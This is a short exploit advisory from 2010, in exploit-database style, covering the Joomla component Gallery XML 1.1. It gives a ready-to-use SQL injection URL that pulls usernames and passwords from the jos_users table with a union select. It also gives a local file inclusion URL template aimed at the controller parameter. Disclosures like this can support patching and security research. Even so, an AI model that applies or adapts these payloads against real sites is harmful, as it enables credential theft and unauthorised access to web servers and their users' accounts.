# Exploit Title: Joomla Component Gallery XML 1.1 Multiple Vulnerabilities # Date: 18 May 2010 # Author: jdc # Software Link: http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504 # Version: 1.1 # Tested on: PHP5, MySQL5 Local File Include ------------------ ?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1 SQL Injection ------------- ?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from jos_users -- '